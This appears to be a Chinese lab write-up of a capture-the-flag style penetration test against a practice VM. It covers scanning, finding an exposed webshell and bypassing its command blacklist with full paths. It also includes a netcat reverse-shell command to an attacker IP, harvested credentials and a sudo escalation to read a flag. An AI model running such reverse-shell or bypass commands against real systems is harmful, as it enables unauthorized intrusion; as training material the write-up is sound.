靶机渗透测试2

测试环境:靶机+kali

1.nmap扫描存活主机,发现靶机ip为192.168.152.132

 

2.对目标主机进行全端口扫描

 

3.尝试访问ftp,发现有权限设置

4.尝试访问80端口

查看网站内页面

新闻页面无可用信息

 关于我们页面无可用信息

 通过联系我们页面中的邮箱可以猜测Bob为管理员

 登录页面不存在

5.尝试访问25468端口,发现无法访问

6.对80端口进行目录扫描

 发现robots.txt

7.访问robots.txt,发现数个文件提示

 尝试访问以上文件

login.php页面无法访问

在dev_shell.php页面发现一个webshell,稍后可以加以利用

 lat_memo.html提示该网站有webshell但是有一定的防护

 passwords.html无可用信息

8.尝试利用webshell

whoami查看当前用户

 ls查看当前目录,发现被屏蔽,推测该webshell设置有黑名单

 尝试用/bin/ls绕过屏蔽,发现成功绕过

9.尝试通过echo写入一句话木马,发现有安全监测

10.尝试通过nc连接到shell

开启kali的nc监听

 通过运行/bin/nc -e /bin/bash 192.168.152.130 6666 拿到shell

11.在根目录下发现flag.txt

 尝试打开flag.txt,发现无法查看

 查看权限后发现需要root权限

12.查看家目录,发现数个用户

 通过对网页信息分析,猜测Bob为管理员,故对Bob展开信息收集

13. 发现关键字段password,打开查看,发现用户名jc密码Qwerty

 14.在documents目录下发现可能有用的文件

 发现login.txt.gpg无法打开,staff.txt无可用信息

 再进入secret目录,再进入keep_out目录,发现还有两个目录

 先查看好康的文件夹,发现没什么好康的

 查看不好康的文件夹,发现notes.sh,猜测与密码有些关系

15.调用命令行提示,切换用户为jc

 

16.尝试解压login.txt.gpg,通过猜测与尝试发现密码为notes.sh中的首字母集,得到Bob的密码

 成功登陆Bob用户

 17.通过Bob的管理员权限,通过sudo调用root权限,成功打开flag.txt

 至此成功获取该靶机flag

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值